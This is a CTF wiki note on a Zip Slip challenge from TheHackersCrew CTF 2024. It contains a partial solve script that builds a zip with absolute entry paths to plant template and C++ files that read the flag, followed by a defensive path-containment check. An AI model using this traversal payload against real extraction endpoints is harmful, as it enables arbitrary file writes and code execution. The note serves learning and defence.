unsolved
Zip Slip + Absolute Paths
Lessons learned from TheHackersCrew CTF 2024: [WEB] niceview1
- Zip Slip is possible with absolute paths (challenge filtered double dots).
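```python
import io
import zipfile

# `name` and `rs` are not defined in this excerpt of the solve script.

# Template view: includes the uploaded helper file, then calls goflag().
payload = f"""
<%inc
#include "{rs}_util.json"
%>
{{% goflag() %}}
"""

# C++ helper pulled in by the #include above; reads the flag file.
payload2 = """
#include <fstream>
std::string goflag() {
    std::ifstream fin("/app/flag.txt");
    std::string line;
    std::getline(fin, line);
    return line;
}
"""

# Build the archive in memory. The entry names are absolute paths,
# so they contain no ".." for the challenge's filter to catch.
zf = io.BytesIO()
with zipfile.ZipFile(zf, 'w') as myzip:
    myzip.writestr(f'/app/views/d/{name}.csp', payload)
    myzip.writestr(f'/app/views/d/{name}.csp.csp', payload)
    myzip.writestr(f'/app/views/d/{name}_util.json', payload2)
```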
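The defensive side of this lesson, as an added example that is not part of the original notes: a filter that only looks for `..` accepts an absolute entry name, while a containment check on the resolved target path rejects it. The function names, the `/srv/extract` destination and the sample archive are constructed for illustration, and the shape of the `..`-only filter is an assumption.

```python
import io
import posixpath
import zipfile


def naive_filter(name: str) -> bool:
    """Assumed shape of a '..'-only filter: accept anything without double dots."""
    return ".." not in name


def is_safe_member(name: str, dest: str) -> bool:
    """True only if the entry, joined onto dest, still resolves inside dest."""
    dest = posixpath.normpath(dest)
    name = name.replace("\\", "/")
    # Reject absolute names and Windows drive prefixes outright.
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return False
    target = posixpath.normpath(posixpath.join(dest, name))
    return target == dest or target.startswith(dest.rstrip("/") + "/")


def audit_archive(data: bytes, dest: str) -> dict:
    """Map each entry name to (naive_filter result, containment result).

    Nothing is extracted; only the stored names are inspected.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: (naive_filter(n), is_safe_member(n, dest))
                for n in zf.namelist()}


def build_sample() -> bytes:
    """Constructed sample archive: one benign, one absolute, one '..' entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("views/ok.csp", "x")
        zf.writestr("/app/views/d/sample.csp", "x")  # absolute entry name
        zf.writestr("../outside.csp", "x")           # classic traversal
    return buf.getvalue()


if __name__ == "__main__":
    for entry, (naive, safe) in audit_archive(build_sample(), "/srv/extract").items():
        print(f"{entry!r}: naive_filter={naive} is_safe_member={safe}")
```

Python's own `ZipFile.extract` strips leading slashes and `..` components from entry names, but a custom or third-party extractor may not, so the check belongs in front of whatever performs the write.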
unsolved.txt · Last modified: 2024/08/21 13:32 by osorin